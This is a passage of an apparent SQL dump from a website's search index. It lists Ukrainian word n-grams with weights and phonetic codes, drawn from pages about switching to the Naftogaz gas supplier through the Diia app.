не',0,1,1.5667,'е000',1,'*'),(1680573,'й автор','й автор',0,1,1.2333,'й000',1,'*'),(1680574,'й автор шикарного','й автор шикарного',0,1,1.5667,'й000',1,'*'),(1680575,'не тільки актор','не тільки актор',0,1,1.5,'н000',1,'*'),(1680576,'рівня','рівня',0,0,0.3333,'р000',1,'*'),(1680577,'рівня але','рівня але',0,1,1.3,'р000',1,'*'),(1680578,'рівня але й','рівня але й',0,1,1.3667,'р000',1,'*'),(1680579,'світового','світового',0,0,0.6,'с000',1,'*'),(1680580,'світового рівня','світового рівня',0,1,1.5,'с000',1,'*'),(1680581,'світового рівня але','світового рівня але',0,1,1.6333,'с000',1,'*'),(1680582,'тільки актор','тільки актор',0,1,1.4,'т000',1,'*'),(1680583,'тільки актор світового','тільки актор світового',0,1,1.7333,'т000',1,'*'),(1680584,'шикарного','шикарного',0,0,0.6,'ш000',1,'*'),(1680585,'шикарного вальсу','шикарного вальсу',0,1,1.5333,'ш000',1,'*'),(1682694,'1 перейдіть','1 перейдіть',0,1,1.3667,'п000',1,'*'),(1682695,'1 перейдіть на','1 перейдіть на',0,1,1.4667,'п000',1,'*'),(1682696,'10-15 хвилин','10-15 хвилин',0,1,1.4,'х000',1,'*'),(1682697,'10-15 хвилин без','10-15 хвилин без',0,1,1.5333,'х000',1,'*'),(1682698,'2 2528','2 2528',0,1,1.2,'',1,'*'),(1682699,'2 2528 zminiti','2 2528 zminiti',0,1,1.4667,'Z530',1,'*'),(1682700,'2 оберіть','2 оберіть',0,1,1.3,'о000',1,'*'),(1682701,'2 оберіть варіант','2 оберіть варіант',0,1,1.5667,'о000',1,'*'),(1682702,'2528','2528',0,0,0.4,'',1,'*'),(1682703,'2528 zminiti','2528 zminiti',0,1,1.4,'Z530',1,'*'),(1682704,'2528 zminiti postachalnika','2528 zminiti postachalnika',0,1,1.8667,'Z531232452',1,'*'),(1682705,'3 серед','3 серед',0,1,1.2333,'с000',1,'*'),(1682706,'3 серед запропонованих','3 серед запропонованих',0,1,1.7333,'с000',1,'*'),(1682707,'4 далі','4 далі',0,1,1.2,'д000',1,'*'),(1682708,'4 далі на','4 далі на',0,1,1.3,'д000',1,'*'),(1682709,'5 доповніть','5 доповніть',0,1,1.3667,'д000',1,'*'),(1682710,'5 доповніть деякі','5 доповніть деякі',0,1,1.5667,'д000',1,'*'),(1682711,'cherez','cherez',0,0,0.4,'C620',1,'*'),(1682712,'cherez diyu','cherez diyu',0,1,1.3667,'C623',1,'*'),(1682713,'diyu','diyu',0,0,0.2667,'D000',1,'*'),(1682714,'gas','gas',0,0,0.2,'G000',1,'*'),(1682715,'gas ua','gas ua',0,1,1.2,'G000',1,'*'),(1682716,'gas ua відбувається','gas ua відбувається',0,1,1.6333,'G000',1,'*'),(1682717,'gas ua у','gas ua у',0,1,1.2667,'G000',1,'*'),(1682718,'gazu teper','gazu teper',0,1,1.3333,'G316',1,'*'),(1682719,'gazu teper mozhna','gazu teper mozhna',0,1,1.5667,'G316525',1,'*'),(1682720,'id-картку','id-картку',0,0,0.6,'I300',1,'*'),(1682721,'id-картку або','id-картку або',0,1,1.4333,'I300',1,'*'),(1682722,'id-картку або рнокпп','id-картку або рнокпп',0,1,1.6667,'I300',1,'*'),(1682723,'mozhna','mozhna',0,0,0.4,'M250',1,'*'),(1682724,'mozhna cherez','mozhna cherez',0,1,1.4333,'M25262',1,'*'),(1682725,'mozhna cherez diyu','mozhna cherez diyu',0,1,1.6,'M252623',1,'*'),(1682726,'novini 2 2528','novini 2 2528',0,1,1.4333,'N150',1,'*'),(1682727,'postachalnika gazu teper','postachalnika gazu teper',0,1,1.8,'P232452316',1,'*'),(1682728,'qr-код','qr-код',0,0,0.4,'Q600',1,'*'),(1682729,'qr-код на','qr-код на',0,1,1.3,'Q600',1,'*'),(1682730,'qr-код на екрані','qr-код на екрані',0,1,1.5333,'Q600',1,'*'),(1682731,'qr-код якщо','qr-код якщо',0,1,1.3667,'Q600',1,'*'),(1682732,'qr-код якщо ж','qr-код якщо ж',0,1,1.4333,'Q600',1,'*'),(1682733,'teper','teper',0,0,0.3333,'T160',1,'*'),(1682734,'teper mozhna','teper mozhna',0,1,1.4,'T16525',1,'*'),(1682735,'teper mozhna cherez','teper mozhna cherez',0,1,1.6333,'T16525262',1,'*'),(1682736,'ua відбувається','ua відбувається',0,1,1.5,'U000',1,'*'),(1682737,'ua відбувається у','ua відбувається у',0,1,1.5667,'U000',1,'*'),(1682738,'ua у','ua у',0,1,1.1333,'U000',1,'*'),(1682739,'ua у розділ','ua у розділ',0,1,1.3667,'U000',1,'*'),(1682740,'«дію»','«дію»',0,0,0.3333,'д000',1,'*'),(1682741,'«дію» покрокова','«дію» покрокова',0,1,1.5,'д000',1,'*'),(1682742,'«дію» покрокова інструкція','«дію» покрокова інструкція',0,1,1.8667,'д000',1,'*'),(1682743,'«дія».','«дія».',0,0,0.4,'д000',1,'*'),(1682744,'«дія». таким','«дія». таким',0,1,1.4,'д000',1,'*'),(1682745,'«дія». таким чином','«дія». таким чином',0,1,1.6,'д000',1,'*'),(1682746,'«надіслати','«надіслати',0,0,0.6667,'н000',1,'*'),(1682747,'«надіслати через','«надіслати через',0,1,1.5333,'н000',1,'*'),(1682748,'«надіслати через дію».','«надіслати через дію».',0,1,1.7333,'н000',1,'*'),(1682749,'«нафтогаз','«нафтогаз',0,0,0.6,'н000',1,'*'),(1682750,'«нафтогаз україни»','«нафтогаз україни»',0,1,1.6,'н000',1,'*'),(1682751,'«нафтогаз україни» gas','«нафтогаз україни» gas',0,1,1.7333,'н200',1,'*'),(1682752,'«нафтогаз україни» із','«нафтогаз україни» із',0,1,1.7,'н000',1,'*'),(1682753,'«нафтогаз україни» копій','«нафтогаз україни» копій',0,1,1.8,'н000',1,'*'),(1682754,'«нафтогаз україни» тепер','«нафтогаз україни» тепер',0,1,1.8,'н000',1,'*'),(1682755,'«нафтогаз україни» через','«нафтогаз україни» через',0,1,1.8,'н000',1,'*'),(1682756,'«подати','«подати',0,0,0.4667,'п000',1,'*'),(1682757,'«подати заявку»','«подати заявку»',0,1,1.5,'п000',1,'*'),(1682758,'«подати заявку» 3','«подати заявку» 3',0,1,1.5667,'п000',1,'*'),(1682759,'«сайт»','«сайт»',0,0,0.4,'с000',1,'*'),(1682760,'«сайт» та','«сайт» та',0,1,1.3,'с000',1,'*'),(1682761,'«сайт» та натисніть','«сайт» та натисніть',0,1,1.6333,'с000',1,'*'),(1682762,'«стати','«стати',0,0,0.4,'с000',1,'*'),(1682763,'«стати нашим','«стати нашим',0,1,1.4,'с000',1,'*'),(1682764,'«стати нашим клієнтом»','«стати нашим клієнтом»',0,1,1.7333,'с000',1,'*'),(1682765,'«сформувати','«сформувати',0,0,0.7333,'с000',1,'*'),(1682766,'«сформувати файл','«сформувати файл',0,1,1.5333,'с000',1,'*'),(1682767,'«сформувати файл заявки»','«сформувати файл заявки»',0,1,1.8,'с000',1,'*'),(1682768,'і оформлення','і оформлення',0,1,1.4,'і000',1,'*'),(1682769,'і оформлення заявки','і оформлення заявки',0,1,1.6333,'і000',1,'*'),(1682770,'її зручним','її зручним',0,1,1.3333,'ї000',1,'*'),(1682771,'її зручним для','її зручним для',0,1,1.4667,'ї000',1,'*'),(1682772,'її обробка','її обробка',0,1,1.3333,'ї000',1,'*'),(1682773,'її обробка триває','її обробка триває',0,1,1.5667,'ї000',1,'*'),(1682774,'із двох','із двох',0,1,1.2333,'і000',1,'*'),(1682775,'із двох документів','із двох документів',0,1,1.6,'і000',1,'*'),(1682776,'із частково','із частково',0,1,1.3667,'і000',1,'*'),(1682777,'із частково заповненими','із частково заповненими',0,1,1.7667,'і000',1,'*'),(1682778,'індивідуальний','індивідуальний',0,0,0.9333,'і000',1,'*'),(1682779,'індивідуальний податковий','індивідуальний податковий',0,1,1.8333,'і000',1,'*'),(1682780,'індивідуальний податковий номер','індивідуальний податковий номер',0,1,2,'і000',1,'*'),(1682781,'інструкція','інструкція',0,0,0.6667,'і000',1,'*'),(1682782,'інструкція 1','інструкція 1',0,1,1.4,'і000',1,'*'),(1682783,'інструкція 1 перейдіть','інструкція 1 перейдіть',0,1,1.7333,'і000',1,'*'),(1682784,'інформацією','інформацією',0,0,0.7333,'і000',1,'*'),(1682785,'інформацією для','інформацією для',0,1,1.5,'і000',1,'*'),(1682786,'інформацією для зміни','інформацією для зміни',0,1,1.7,'і000',1,'*'),(1682787,'іпн','іпн',0,0,0.2,'і000',1,'*'),(1682788,'іпн індивідуальний','іпн індивідуальний',0,1,1.6,'і000',1,'*'),(1682789,'іпн індивідуальний податковий','іпн індивідуальний податковий',0,1,1.9667,'і000',1,'*'),(1682790,'а її обробка','а її обробка',0,1,1.4,'а000',1,'*'),(1682791,'або від','або від',0,1,1.2333,'а000',1,'*'),(1682792,'або від руки','або від руки',0,1,1.4,'а000',1,'*'),(1682793,'або рнокпп','або рнокпп',0,1,1.3333,'а000',1,'*'),(1682794,'або рнокпп раніше','або рнокпп раніше',0,1,1.5667,'а000',1,'*'),(1682795,'актуалізації','актуалізації',0,0,0.8,'а000',1,'*'),(1682796,'актуалізації даних','актуалізації даних',0,1,1.6,'а000',1,'*'),(1682797,'актуалізації даних на','актуалізації даних на',0,1,1.7,'а000',1,'*'),(1682798,'без урахування','без урахування',0,1,1.4667,'б000',1,'*'),(1682799,'без урахування актуалізації','без урахування актуалізації',0,1,1.9,'б000',1,'*'),(1682800,'будуть підвантажені','будуть підвантажені',0,1,1.6333,'б000',1,'*'),(1682801,'будуть підвантажені з','будуть підвантажені з',0,1,1.7,'б000',1,'*'),(1682802,'в середньому','в середньому',0,1,1.4,'в000',1,'*'),(1682803,'в середньому три','в середньому три',0,1,1.5333,'в000',1,'*'),(1682804,'від гк','від гк',0,1,1.2,'в000',1,'*'),(1682805,'від гк «нафтогаз','від гк «нафтогаз',0,1,1.5333,'в000',1,'*'),(1682806,'від руки','від руки',0,1,1.2667,'в000',1,'*'),(1682807,'від руки отже','від руки отже',0,1,1.4333,'в000',1,'*'),(1682808,'відбувається у','відбувається у',0,1,1.4667,'в000',1,'*'),(1682809,'відбувається у кілька','відбувається у кілька',0,1,1.7,'в000',1,'*'),(1682810,'відскануйте','відскануйте',0,0,0.7333,'в000',1,'*'),(1682811,'відскануйте запропонований','відскануйте запропонований',0,1,1.8667,'в000',1,'*'),(1682812,'відскануйте запропонований qr-код','відскануйте запропонований qr-код',0,1,2,'в260',1,'*'),(1682813,'вам обрати','вам обрати',0,1,1.3333,'в000',1,'*'),(1682814,'вам обрати один','вам обрати один',0,1,1.5,'в000',1,'*'),(1682815,'варіант подачі','варіант подачі',0,1,1.4667,'в000',1,'*'),(1682816,'варіант подачі заявки','варіант подачі заявки',0,1,1.7,'в000',1,'*'),(1682817,'вас способом','вас способом',0,1,1.4,'в000',1,'*'),(1682818,'вас способом електронним','вас способом електронним',0,1,1.8,'в000',1,'*'),(1682819,'ваша','ваша',0,0,0.2667,'в000',1,'*'),(1682820,'ваша заявка','ваша заявка',0,1,1.3667,'в000',1,'*'),(1682821,'ваша заявка на','ваша заявка на',0,1,1.4667,'в000',1,'*'),(1682822,'вашому','вашому',0,0,0.4,'в000',1,'*'),(1682823,'вашому застосунку','вашому застосунку',0,1,1.5667,'в000',1,'*'),(1682824,'вашому застосунку дія','вашому застосунку дія',0,1,1.7,'в000',1,'*'),(1682825,'вашому смартфоні','вашому смартфоні',0,1,1.5333,'в000',1,'*'),(1682826,'вашому смартфоні потрібно','вашому смартфоні потрібно',0,1,1.8333,'в000',1,'*'),(1682827,'верифіковано','верифіковано',0,0,0.8,'в000',1,'*'),(1682828,'верифіковано у','верифіковано у',0,1,1.4667,'в000',1,'*'),(1682829,'верифіковано у вашому','верифіковано у вашому',0,1,1.7,'в000',1,'*'),(1682830,'версії','версії',0,0,0.4,'в000',1,'*'),(1682831,'версії сайту','версії сайту',0,1,1.4,'в000',1,'*'),(1682832,'версії сайту просто','версії сайту просто',0,1,1.6333,'в000',1,'*'),(1682833,'ви заповнюєте','ви заповнюєте',0,1,1.4333,'в000',1,'*'),(1682834,'ви заповнюєте заявку','ви заповнюєте заявку',0,1,1.6667,'в000',1,'*'),(1682835,'вибір оптимального','вибір оптимального',0,1,1.6,'в000',1,'*'),(1682836,'вибір оптимального тарифного','вибір оптимального тарифного',0,1,1.9333,'в000',1,'*'),(1682837,'всього','всього',0,0,0.4,'в000',1,'*'),(1682838,'всього кілька','всього кілька',0,1,1.4333,'в000',1,'*'),(1682839,'всього кілька хвилин','всього кілька хвилин',0,1,1.6667,'в000',1,'*'),(1682840,'газопостачальної','газопостачальної',0,0,1,'г000',1,'*'),(1682841,'газопостачальної компанії','газопостачальної компанії',0,1,1.8333,'г000',1,'*'),(1682842,'газопостачальної компанії «нафтогаз','газопостачальної компанії «нафтогаз',0,1,2,'г000',1,'*'),(1682843,'газопостачання','газопостачання',0,0,0.9333,'г000',1,'*'),(1682844,'газопостачання від','газопостачання від',0,1,1.6,'г000',1,'*'),(1682845,'газопостачання від гк','газопостачання від гк',0,1,1.7,'г000',1,'*'),(1682846,'газу і оформлення','газу і оформлення',0,1,1.5667,'г000',1,'*'),(1682847,'газу гк','газу гк',0,1,1.2333,'г000',1,'*'),(1682848,'газу гк «нафтогаз','газу гк «нафтогаз',0,1,1.5667,'г000',1,'*'),(1682849,'газу тепер','газу тепер',0,1,1.3333,'г000',1,'*'),(1682850,'газу тепер можна','газу тепер можна',0,1,1.5333,'г000',1,'*'),(1682851,'гк','гк',0,0,0.1333,'г000',1,'*'),(1682852,'гк «нафтогаз','гк «нафтогаз',0,1,1.4,'г000',1,'*'),(1682853,'гк «нафтогаз україни»','гк «нафтогаз україни»',0,1,1.7,'г000',1,'*'),(1682854,'гтс','гтс',0,0,0.2,'г000',1,'*'),(1682855,'гтс що','гтс що',0,1,1.2,'г000',1,'*'),(1682856,'гтс що триває','гтс що триває',0,1,1.4333,'г000',1,'*'),(1682857,'дію','дію',0,0,0.2,'д000',1,'*'),(1682858,'дію система','дію система',0,1,1.3667,'д000',1,'*'),(1682859,'дію система запропонує','дію система запропонує',0,1,1.7333,'д000',1,'*'),(1682860,'дію».','дію».',0,0,0.3333,'д000',1,'*'),(1682861,'дію». після','дію». після',0,1,1.3667,'д000',1,'*'),(1682862,'дію». після підтвердження','дію». після підтвердження',0,1,1.8333,'д000',1,'*'),(1682863,'дія та','дія та',0,1,1.2,'д000',1,'*'),(1682864,'дія та відскануйте','дія та відскануйте',0,1,1.6,'д000',1,'*'),(1682865,'далі на','далі на',0,1,1.2333,'д000',1,'*'),(1682866,'далі на вашому','далі на вашому',0,1,1.4667,'д000',1,'*'),(1682867,'даними які','даними які',0,1,1.3333,'д000',1,'*'),(1682868,'даними які будуть','даними які будуть',0,1,1.5667,'д000',1,'*'),(1682869,'даних','даних',0,0,0.3333,'д000',1,'*'),(1682870,'даних на','даних на',0,1,1.2667,'д000',1,'*'),(1682871,'даних на платформі','даних на платформі',0,1,1.6,'д000',1,'*'),(1682872,'двох документів','двох документів',0,1,1.5,'д000',1,'*'),(1682873,'двох документів id-картку','двох документів id-картку',0,1,1.8333,'д300',1,'*'),(1682874,'державного','державного',0,0,0.6667,'д000',1,'*'),(1682875,'державного постачальника','державного постачальника',0,1,1.8,'д000',1,'*'),(1682876,'державного постачальника газу','державного постачальника газу',0,1,1.9667,'д000',1,'*'),(1682877,'деякі поля','деякі поля',0,1,1.3333,'д000',1,'*'),(1682878,'деякі поля необхідною','деякі поля необхідною',0,1,1.7,'д000',1,'*'),(1682879,'для вас','для вас',0,1,1.2333,'д000',1,'*'),(1682880,'для вас способом','для вас способом',0,1,1.5333,'д000',1,'*'),(1682881,'для зміни','для зміни',0,1,1.3,'д000',1,'*'),(1682882,'для зміни постачальника','для зміни постачальника',0,1,1.7667,'д000',1,'*'),(1682883,'для купівлі','для купівлі',0,1,1.3667,'д000',1,'*'),(1682884,'для купівлі газу','для купівлі газу',0,1,1.5333,'д000',1,'*'),(1682885,'дні https','дні https',0,1,1.3,'д312',1,'*'),(1682886,'дні https gazpravda','дні https gazpravda',0,1,1.6333,'д3121613',1,'*'),(1682887,'до газопостачання','до газопостачання',0,1,1.5667,'д000',1,'*'),(1682888,'до газопостачання від','до газопостачання від',0,1,1.7,'д000',1,'*'),(1682889,'до державного','до державного',0,1,1.4333,'д000',1,'*'),(1682890,'до державного постачальника','до державного постачальника',0,1,1.9,'д000',1,'*'),(1682891,'додано','додано',0,0,0.4,'д000',1,'*'),(1682892,'додано та','додано та',0,1,1.3,'д000',1,'*'),(1682893,'додано та верифіковано','додано та верифіковано',0,1,1.7333,'д000',1,'*'),(1682894,'додатку','додатку',0,0,0.4667,'д000',1,'*'),(1682895,'додатку дія','додатку дія',0,1,1.3667,'д000',1,'*'),(1682896,'документ який','документ який',0,1,1.4333,'д000',1,'*'),(1682897,'документ який додано','документ який додано',0,1,1.6667,'д000',1,'*'),(1682898,'документів id-картку','документів id-картку',0,1,1.6667,'д300',1,'*'),(1682899,'документів id-картку або','документів id-картку або',0,1,1.8,'д300',1,'*'),(1682900,'документу','документу',0,0,0.6,'д000',1,'*'),(1682901,'документу натиснувши','документу натиснувши',0,1,1.6667,'д000',1,'*'),(1682902,'документу натиснувши кнопку','документу натиснувши кнопку',0,1,1.9,'д000',1,'*'),(1682903,'доповніть','доповніть',0,0,0.6,'д000',1,'*'),(1682904,'доповніть деякі','доповніть деякі',0,1,1.5,'д000',1,'*'),(1682905,'доповніть деякі поля','доповніть деякі поля',0,1,1.6667,'д000',1,'*'),(1682906,'екрані','екрані',0,0,0.4,'е000',1,'*'),(1682907,'екрані 4','екрані 4',0,1,1.2667,'е000',1,'*'),(1682908,'екрані 4 далі','екрані 4 далі',0,1,1.4333,'е000',1,'*'),(1682909,'екраніз\'явиться','екраніз',0,0,1,'е000',1,'*'),(1682910,'екраніз\'явиться ваша','екраніз ваша',0,1,1.6667,'е000',1,'*'),(1682911,'екраніз\'явиться ваша заявка','екраніз ваша заявка',0,1,1.9,'е000',1,'*'),(1682912,'електронним','електронним',0,0,0.7333,'е000',1,'*'),(1682913,'електронним підписом','електронним підписом',0,1,1.6667,'е000',1,'*'),(1682914,'електронним підписом кеп','електронним підписом кеп',0,1,1.8,'е000',1,'*'),(1682915,'ж ви','ж ви',0,1,1.1333,'ж000',1,'*'),(1682916,'ж ви заповнюєте','ж ви заповнюєте',0,1,1.5,'ж000',1,'*'),(1682917,'з додатку','з додатку',0,1,1.3,'з000',1,'*'),(1682918,'з додатку дія','з додатку дія',0,1,1.4333,'з000',1,'*'),(1682919,'завершити','завершити',0,0,0.6,'з000',1,'*'),(1682920,'завершити процес','завершити процес',0,1,1.5333,'з000',1,'*'),(1682921,'завершити процес натисніть','завершити процес натисніть',0,1,1.8667,'з000',1,'*'),(1682922,'займе','займе',0,0,0.3333,'з000',1,'*'),(1682923,'займе всього','займе всього',0,1,1.4,'з000',1,'*'),(1682924,'займе всього кілька','займе всього кілька',0,1,1.6333,'з000',1,'*'),(1682925,'заповненими','заповненими',0,0,0.7333,'з000',1,'*'),(1682926,'заповненими даними','заповненими даними',0,1,1.6,'з000',1,'*'),(1682927,'заповненими даними які','заповненими даними які',0,1,1.7333,'з000',1,'*'),(1682928,'заповнення','заповнення',0,0,0.6667,'з000',1,'*'),(1682929,'заповнення заявки','заповнення заявки',0,1,1.5667,'з000',1,'*'),(1682930,'заповнення заявки оберіть','заповнення заявки оберіть',0,1,1.8333,'з000',1,'*'),(1682931,'заповнюєте','заповнюєте',0,0,0.6667,'з000',1,'*'),(1682932,'заповнюєте заявку','заповнюєте заявку',0,1,1.5667,'з000',1,'*'),(1682933,'заповнюєте заявку у','заповнюєте заявку у',0,1,1.6333,'з000',1,'*'),(1682934,'запропонований','запропонований',0,0,0.9333,'з000',1,'*'),(1682935,'запропонований qr-код','запропонований qr-код',0,1,1.7,'з260',1,'*'),(1682936,'запропонований qr-код якщо','запропонований qr-код якщо',0,1,1.8667,'з260',1,'*'),(1682937,'запропонованих','запропонованих',0,0,0.9333,'з000',1,'*'),(1682938,'запропонованих способів','запропонованих способів',0,1,1.7667,'з000',1,'*'),(1682939,'запропонованих способів заповнення','запропонованих способів заповнення',0,1,2,'з000',1,'*'),(1682940,'запропонує','запропонує',0,0,0.6667,'з000',1,'*'),(1682941,'запропонує вам','запропонує вам',0,1,1.4667,'з000',1,'*'),(1682942,'запропонує вам обрати','запропонує вам обрати',0,1,1.7,'з000',1,'*'),(1682943,'застосунку','застосунку',0,0,0.6667,'з000',1,'*'),(1682944,'застосунку дія','застосунку дія',0,1,1.4667,'з000',1,'*'),(1682945,'застосунку дія та','застосунку дія та',0,1,1.5667,'з000',1,'*'),(1682946,'застосунок','застосунок',0,0,0.6667,'з000',1,'*'),(1682947,'застосунок «дія».','застосунок «дія».',0,1,1.5667,'з000',1,'*'),(1682948,'застосунок «дія». таким','застосунок «дія». таким',0,1,1.7667,'з000',1,'*'),(1682949,'заявка','заявка',0,0,0.4,'з000',1,'*'),(1682950,'заявка на','заявка на',0,1,1.3,'з000',1,'*'),(1682951,'заявка на приєднання','заявка на приєднання',0,1,1.6667,'з000',1,'*'),(1682952,'заявки','заявки',0,0,0.4,'з000',1,'*'),(1682953,'заявки «сайт»','заявки «сайт»',0,1,1.4333,'з000',1,'*'),(1682954,'заявки «сайт» та','заявки «сайт» та',0,1,1.5333,'з000',1,'*'),(1682955,'заявки на','заявки на',0,1,1.3,'з000',1,'*'),(1682956,'заявки на приєднання','заявки на приєднання',0,1,1.6667,'з000',1,'*'),(1682957,'заявки на сайті','заявки на сайті',0,1,1.5,'з000',1,'*'),(1682958,'заявки оберіть','заявки оберіть',0,1,1.4667,'з000',1,'*'),(1682959,'заявки оберіть дію','заявки оберіть дію',0,1,1.6,'з000',1,'*'),(1682960,'заявки»','заявки»',0,0,0.4667,'з000',1,'*'),(1682961,'заявки» та','заявки» та',0,1,1.3333,'з000',1,'*'),(1682962,'заявки» та підпишіть','заявки» та підпишіть',0,1,1.6667,'з000',1,'*'),(1682963,'заявку','заявку',0,0,0.4,'з000',1,'*'),(1682964,'заявку у','заявку у',0,1,1.2667,'з000',1,'*'),(1682965,'заявку у мобільній','заявку у мобільній',0,1,1.6,'з000',1,'*'),(1682966,'заявку»','заявку»',0,0,0.4667,'з000',1,'*'),(1682967,'заявку» 3','заявку» 3',0,1,1.3,'з000',1,'*'),(1682968,'заявку» 3 серед','заявку» 3 серед',0,1,1.5,'з000',1,'*'),(1682969,'зміни постачальника щоб','зміни постачальника щоб',0,1,1.7667,'з000',1,'*'),(1682970,'зручним','зручним',0,0,0.4667,'з000',1,'*'),(1682971,'зручним для','зручним для',0,1,1.3667,'з000',1,'*'),(1682972,'зручним для вас','зручним для вас',0,1,1.5,'з000',1,'*'),(1682973,'зручно','зручно',0,0,0.4,'з000',1,'*'),(1682974,'зручно стати','зручно стати',0,1,1.4,'з000',1,'*'),(1682975,'зручно стати клієнтом','зручно стати клієнтом',0,1,1.7,'з000',1,'*'),(1682976,'кілька кліків','кілька кліків',0,1,1.4333,'к000',1,'*'),(1682977,'кілька кліків а','кілька кліків а',0,1,1.5,'к000',1,'*'),(1682978,'кілька хвилин','кілька хвилин',0,1,1.4333,'к000',1,'*'),(1682979,'кілька хвилин як','кілька хвилин як',0,1,1.5333,'к000',1,'*'),(1682980,'кеп','кеп',0,0,0.2,'к000',1,'*'),(1682981,'кеп або','кеп або',0,1,1.2333,'к000',1,'*'),(1682982,'кеп або від','кеп або від',0,1,1.3667,'к000',1,'*'),(1682983,'клієнтом','клієнтом',0,0,0.5333,'к000',1,'*'),(1682984,'клієнтом газопостачальної','клієнтом газопостачальної',0,1,1.8333,'к000',1,'*'),(1682985,'клієнтом газопостачальної компанії','клієнтом газопостачальної компанії',0,1,2,'к000',1,'*'),(1682986,'клієнтом»','клієнтом»',0,0,0.6,'к000',1,'*'),(1682987,'клієнтом» 2','клієнтом» 2',0,1,1.3667,'к000',1,'*'),(1682988,'клієнтом» 2 оберіть','клієнтом» 2 оберіть',0,1,1.6333,'к000',1,'*'),(1682989,'кліків','кліків',0,0,0.4,'к000',1,'*'),(1682990,'кліків а','кліків а',0,1,1.2667,'к000',1,'*'),(1682991,'кліків а її','кліків а її',0,1,1.3667,'к000',1,'*'),(1682992,'кнопку','кнопку',0,0,0.4,'к000',1,'*'),(1682993,'кнопку «надіслати','кнопку «надіслати',0,1,1.5667,'к000',1,'*'),(1682994,'кнопку «надіслати через','кнопку «надіслати через',0,1,1.7667,'к000',1,'*'),(1682995,'компанії','компанії',0,0,0.5333,'к000',1,'*'),(1682996,'компанії gas','компанії gas',0,1,1.4,'к200',1,'*'),(1682997,'компанії gas ua','компанії gas ua',0,1,1.5,'к200',1,'*'),(1682998,'компанії «нафтогаз','компанії «нафтогаз',0,1,1.6,'к000',1,'*'),(1682999,'компанії «нафтогаз україни»','компанії «нафтогаз україни»',0,1,1.9,'к000',1,'*'),(1683000,'компанії гк','компанії гк',0,1,1.3667,'к000',1,'*'),(1683001,'компанії гк «нафтогаз','компанії гк «нафтогаз',0,1,1.7,'к000',1,'*'),(1683002,'копій','копій',0,0,0.3333,'к000',1,'*'),(1683003,'копій обраного','копій обраного',0,1,1.4667,'к000',1,'*'),(1683004,'копій обраного цифрового','копій обраного цифрового',0,1,1.8,'к000',1,'*'),(1683005,'купівлі','купівлі',0,0,0.4667,'к000',1,'*'),(1683006,'купівлі газу','купівлі газу',0,1,1.4,'к000',1,'*'),(1683007,'купівлі газу і','купівлі газу і',0,1,1.4667,'к000',1,'*'),(1683008,'мобільній','мобільній',0,0,0.6,'м000',1,'*'),(1683009,'мобільній версії','мобільній версії',0,1,1.5333,'м000',1,'*'),(1683010,'мобільній версії сайту','мобільній версії сайту',0,1,1.7333,'м000',1,'*'),(1683011,'можна через','можна через',0,1,1.3667,'м000',1,'*'),(1683012,'можна через «дію»','можна через «дію»',0,1,1.5667,'м000',1,'*'),(1683013,'можна через застосунок','можна через застосунок',0,1,1.7333,'м000',1,'*'),(1683014,'на qr-код','на qr-код',0,1,1.3,'н260',1,'*'),(1683015,'на qr-код на','на qr-код на',0,1,1.4,'н260',1,'*'),(1683016,'на вашому','на вашому',0,1,1.3,'н000',1,'*'),(1683017,'на вашому смартфоні','на вашому смартфоні',0,1,1.6333,'н000',1,'*'),(1683018,'на екрані','на екрані',0,1,1.3,'н000',1,'*'),(1683019,'на екрані 4','на екрані 4',0,1,1.3667,'н000',1,'*'),(1683020,'на екраніз\'явиться','на екраніз',0,1,1.6,'н000',1,'*'),(1683021,'на екраніз\'явиться ваша','на екраніз ваша',0,1,1.7667,'н000',1,'*'),(1683022,'на офіційний','на офіційний',0,1,1.4,'н000',1,'*'),(1683023,'на офіційний сайт','на офіційний сайт',0,1,1.5667,'н000',1,'*'),(1683024,'на платформі','на платформі',0,1,1.4,'н000',1,'*'),(1683025,'на платформі оператора','на платформі оператора',0,1,1.7333,'н000',1,'*'),(1683026,'на приєднання','на приєднання',0,1,1.4333,'н000',1,'*'),(1683027,'на приєднання до','на приєднання до',0,1,1.5333,'н000',1,'*'),(1683028,'на приєднання займе','на приєднання займе',0,1,1.6333,'н000',1,'*'),(1683029,'на сайті','на сайті',0,1,1.2667,'н000',1,'*'),(1683030,'на сайті компанії','на сайті компанії',0,1,1.5667,'н000',1,'*'),(1683031,'натисніть','натисніть',0,0,0.6,'н000',1,'*'),(1683032,'натисніть «подати','натисніть «подати',0,1,1.5667,'н000',1,'*'),(1683033,'натисніть «подати заявку»','натисніть «подати заявку»',0,1,1.8333,'н000',1,'*'),(1683034,'натисніть «сформувати','натисніть «сформувати',0,1,1.7,'н000',1,'*'),(1683035,'натисніть «сформувати файл','натисніть «сформувати файл',0,1,1.8667,'н000',1,'*'),(1683036,'натисніть на','натисніть на',0,1,1.4,'н000',1,'*'),(1683037,'натисніть на qr-код','натисніть на qr-код',0,1,1.6333,'н260',1,'*'),(1683038,'натиснувши','натиснувши',0,0,0.6667,'н000',1,'*'),(1683039,'натиснувши кнопку','натиснувши кнопку',0,1,1.5667,'н000',1,'*'),(1683040,'натиснувши кнопку «надіслати','натиснувши кнопку «надіслати',0,1,1.9333,'н000',1,'*'),(1683041,'нашим','нашим',0,0,0.3333,'н000',1,'*'),(1683042,'нашим клієнтом»','нашим клієнтом»',0,1,1.5,'н000',1,'*'),(1683043,'нашим клієнтом» 2','нашим клієнтом» 2',0,1,1.5667,'н000',1,'*'),(1683044,'необхідною','необхідною',0,0,0.6667,'н000',1,'*'),(1683045,'необхідною інформацією','необхідною інформацією',0,1,1.7333,'н000',1,'*'),(1683046,'необхідною інформацією для','необхідною інформацією для',0,1,1.8667,'н000',1,'*'),(1683047,'номер','номер',0,0,0.3333,'н000',1,'*'),(1683048,'номер оберіть','номер оберіть',0,1,1.4333,'н000',1,'*'),(1683049,'номер оберіть саме','номер оберіть саме',0,1,1.6,'н000',1,'*'),(1683050,'оберіть','оберіть',0,0,0.4667,'о000',1,'*'),(1683051,'оберіть варіант','оберіть варіант',0,1,1.5,'о000',1,'*'),(1683052,'оберіть варіант подачі','оберіть варіант подачі',0,1,1.7333,'о000',1,'*'),(1683053,'оберіть дію','оберіть дію',0,1,1.3667,'о000',1,'*'),(1683054,'оберіть дію система','оберіть дію система',0,1,1.6333,'о000',1,'*'),(1683055,'оберіть саме','оберіть саме',0,1,1.4,'о000',1,'*'),(1683056,'оберіть саме той','оберіть саме той',0,1,1.5333,'о000',1,'*'),(1683057,'обраного цифрового','обраного цифрового',0,1,1.6,'о000',1,'*'),(1683058,'обраного цифрового документу','обраного цифрового документу',0,1,1.9333,'о000',1,'*'),(1683059,'обрати один','обрати 